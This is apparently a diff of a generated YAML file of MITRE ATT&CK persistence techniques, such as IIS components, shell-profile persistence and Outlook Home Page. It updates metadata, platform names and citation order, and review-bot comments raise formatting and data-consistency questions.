- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -33174,9 +33588,6 @@ persistence:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1505.004:
technique:
@@ -33236,7 +33647,7 @@ persistence:
description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
on Targets in the Middle East. Retrieved July 6, 2018.
source_name: Unit 42 RGDoor Jan 2018
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:06:24.161Z'
name: IIS Components
description: |-
Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version
, Http{Extension/Filter}Proc
, and (optionally) Terminate{Extension/Filter}
. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
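Review bot: in the T1505.004 description (context lines of this hunk) the function names `Get{Extension/Filter}Version`, `Http{Extension/Filter}Proc` and `Terminate{Extension/Filter}` have each been pushed onto their own line with the following comma stranded at the start of the next line, so the sentence renders as broken text; this is pre-existing and comes from how the generator strips inline code spans, but since the file is being regenerated anyway it is worth fixing the span handling so the identifiers stay inline with their punctuation.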
@@ -33261,13 +33672,11 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.004
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
@@ -33320,8 +33729,8 @@ persistence:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -33369,78 +33778,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -33488,6 +33830,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -33498,9 +33844,13 @@ persistence:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -33509,8 +33859,67 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests: []
T1547.002:
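Review bot: the `bencane blog bashrc` reference in T1546.004 now points at a web.archive.org snapshot with its retrieval date changed to September 25, 2024 (lines re-added in this hunk), which is the one citation-level content change in a hunk that otherwise moves the whole `external_references` list from the top of the object to the bottom and reorders it from citation order to what looks like alphabetical by author; the link swap deserves a line in the commit message so nobody later reads the archived URL as a mistake, and the new ordering should be the generator's stable order so the list does not churn again next release.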
@@ -33547,7 +33956,7 @@ persistence:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -33570,12 +33979,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -33653,41 +34061,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1137.004:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
- type: attack-pattern
- created: '2019-11-07T20:09:56.536Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.004
- url: https://attack.mitre.org/techniques/T1137/004
- - source_name: SensePost Outlook Home Page
- url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
- description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
- Ruler Vector. Retrieved February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:13.742Z'
name: 'Office Application Startup: Outlook Home Page'
description: |
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -33696,27 +34074,54 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+ created: '2019-11-07T20:09:56.536Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/004
+ external_id: T1137.004
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Home Page
+ description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+ Ruler Vector. Retrieved February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.004
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -33777,7 +34182,6 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
@@ -33821,7 +34225,7 @@ persistence:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -33843,7 +34247,6 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -33924,7 +34327,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -33947,7 +34349,7 @@ persistence:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -33977,12 +34379,10 @@ persistence:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -34072,12 +34472,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -34162,7 +34561,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -34227,18 +34625,17 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -34271,10 +34668,9 @@ persistence:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
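Review bot: the platform change for T1556.009 removes `SaaS` as well as `Azure AD` and adds only `Identity Provider`, while the description two hunks above still names Okta and JumpCloud next to Entra ID. Folding Azure AD into Identity Provider is one change; dropping SaaS is a separate one, and it should be confirmed against the source bundle rather than assumed, because any index or mapping keyed by platform will stop listing this technique under SaaS after this merge.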
@@ -34311,7 +34707,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.001:
technique:
@@ -34385,7 +34780,7 @@ persistence:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -34413,12 +34808,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1505:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T21:18:29.349Z'
name: Server Software Component
description: 'Adversaries may abuse legitimate extensible development features
of servers to establish persistent access to systems. Enterprise server applications
@@ -34477,33 +34871,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -34524,6 +34895,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -34538,52 +34910,42 @@ persistence:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
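Review bot: `x_mitre_permissions_required` with `Administrator` is removed from T1556.001 (the `- x_mitre_permissions_required:` and `- - Administrator` lines) and nothing replaces it, so anything that selects or filters tests by required privilege loses that signal for this technique; confirm the field is absent in the upstream object rather than dropped by the generator. Separately, this hunk is hard to review because `type`, `id`, `created`, `external_references` and `object_marking_refs` moved from the top of the block to the bottom, which makes the diff interleave the tail of T1556.001 with the head of T1556.005; emitting keys in a stable order (upstream order, or sorted) would keep future regenerations down to the real changes.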
@@ -34605,6 +34967,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
